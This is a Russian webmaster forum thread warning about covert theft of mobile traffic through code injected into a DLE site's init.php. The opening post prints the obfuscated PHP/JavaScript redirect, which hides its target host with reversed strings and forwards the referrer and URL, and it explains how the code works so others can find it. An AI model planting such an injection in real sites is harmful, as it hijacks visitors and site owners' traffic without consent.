​Незаметное воровство WAP Трафика. Будьте Внимательны!

compik
На сайте с 26.07.2008
Offline
134
3376

​Способы которые ранее встречались были только размещение кода в .htaccess или скажем JavaScript кода в файлах. Данный метод оказался совсем другим, более умным и незаметным в каком то смысле. Не каждый же день Вы проверяйте "мобильные версии" своих сайтов ? :)

Воры же эти, постарались маскироватся под пп ZIPWAP.RU. По этому исследование файла проходило с помощью zipwap_ru. Файл, где размешается данный код init.php (движок DLE, /engine/init.php).

Вот часть от кода.

if ( !$_SESSION['mobile_disable'] )  

{ if ( check_smartphone() ) {echo "<s"."cript>window.loc"."ation=(\"ht\"+\"tp:\"+\"//".$zip.$wap.$ru."/user/id?14&seo\"+\"ref=\"+encodeURIComponent(document.referrer)+ \"&para\"+\"meter=$key\"+\"word&se=$se&ur=1&H"."TT"."P_REF"."ERER=\"+enc"."odeURIComponent(docu"."ment.URL));</s"."cript>";

if ( @is_dir ( ROOT_DIR . '/templates/smartphone' ) ) {

$config['skin'] = "smartphone";
$smartphone_detected = true;
$config['allow_comments_wysiwyg'] = "no";

}

}

}

Как оказалось, $zip.$wap.$ru."/user/id?14&seo лишь маскировка, на самом деле ссылки ведут на эти страницы.

Ответ zipwap_ru

в середине файла в абсолютно незначащем месте идет их объявление

$ru=strrev('ten.');$wap=strrev('edylc');$zip=strrev('ni');

sttrev делает переворот строки задом наперед

потом при генерации ссылки они подставляются

echo "<s"."cript>window.loc"."ation=(\"ht\"+\"tp:\"+\"//".$zip.$wap.$ru.

а этот темплейт:
@is_dir ( ROOT_DIR . '/templates/smartphone' )

это относится к ДЛЕ движку, подгружает необходимый скин

По адресу http://inclyde.net - чудо биржа трафика. Но кто именно user/id?14 пока не известно.

Спасибо zipwap_ru за оперативные ответы. И еще, коды были размещены на сайтах, где не было редиректа мобильного трафика.

И конечно интересует вопрос: На какую ПП сливался трафик ? Выяснить пока не удалось.

Будьте Внимательны! Проверяйте свои сайты почаще! :)

► Быстрые выделенные и виртуальные серверы под любые цели! (https://clck.ru/MCPRA)
compik
На сайте с 26.07.2008
Offline
134
#1

http://forum.ru-board.com/topic.cgi?forum=31&topic=18643#9

Да это клиент wapsyst-а, ссылки их типа и домен их - они разбираются пока.

WapSyst.biz, можете опровергнуть или подтвердить данную информацию ?

Redbaron _chaos
На сайте с 12.08.2009
Offline
667
#2

Это все понятно, а на драгих движках эта гадость есть?

И вообще, киньте ссыль как онлайн проверить, не помню где видел.

Как будто с телефона заходишь на сайт.

Просто у меня мобила для звонков))) Там СМС самая передовая технология)

Гемблинг, беттинг, крипта на весь мир в 3snet, 1500+ офферов. ( https://clck.ru/TdZLM ) = = CPA.HOUSE - Топовая CPA сеть ( https://clck.ru/34Swci )
EVGENIY22
На сайте с 07.11.2006
Offline
408
#3

Redbaron_chaos, эмулятор оперы.

compik:
WapSyst.biz, можете опровергнуть или подтвердить данную информацию ?

Ломают многих, у самого сломали 3 сайта, правда поизвращенней, шел редирект на Остапов. Все почистил и не стал ныть ибо смысла нет, тк. сами занимаемся не благотворительностью ;)

Скупаю сайты с доходом от контекста - Яндекс директ и Google Adsense! Пишем в личку.
compik
На сайте с 26.07.2008
Offline
134
#4

Redbaron_chaos, Opera Mini simulator

EVGENIY22:
Ломают многих, у самого сломали 3 сайта, правда поизвращенней, шел редирект на Остапов. Все почистил и не стал ныть ибо смысла нет, тк. сами занимаемся не благотворительностью ;)

Интересно все же что за партнерка была ;)

imisterio
На сайте с 06.09.2009
Offline
184
#5

Что за магическая тема?

compik
На сайте с 26.07.2008
Offline
134
#6
imisterio:
Что за магическая тема?

imisterio, код был прописан на тех сайтах, где не было редиректа мобильного трафика. По этому можно и не заметить, не каждый же день Вы проверяйте все свои сайты ?

imisterio
На сайте с 06.09.2009
Offline
184
#7
compik:
imisterio, код был прописан на тех сайтах, где не было редиректа мобильного трафика. По этому можно и не заметить, не каждый же день Вы проверяйте все свои сайты ?

Я про нестандартный шрифт во вкладке браузера.

M
На сайте с 18.04.2010
Offline
77
#8

Opera Mobile Emulator'ом можно смотреть!

скачайте с офф сайта оперы.

Mastak7
На сайте с 05.11.2009
Offline
158
#9

под андроид эмуляторы есть? хотел проверить правильность отдачи, расширение .auto стоит.

:)
Remember
На сайте с 03.12.2011
Offline
114
#10
Mastak7:
под андроид эмуляторы есть? хотел проверить правильность отдачи, расширение .auto стоит.

Start BlueStacks

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий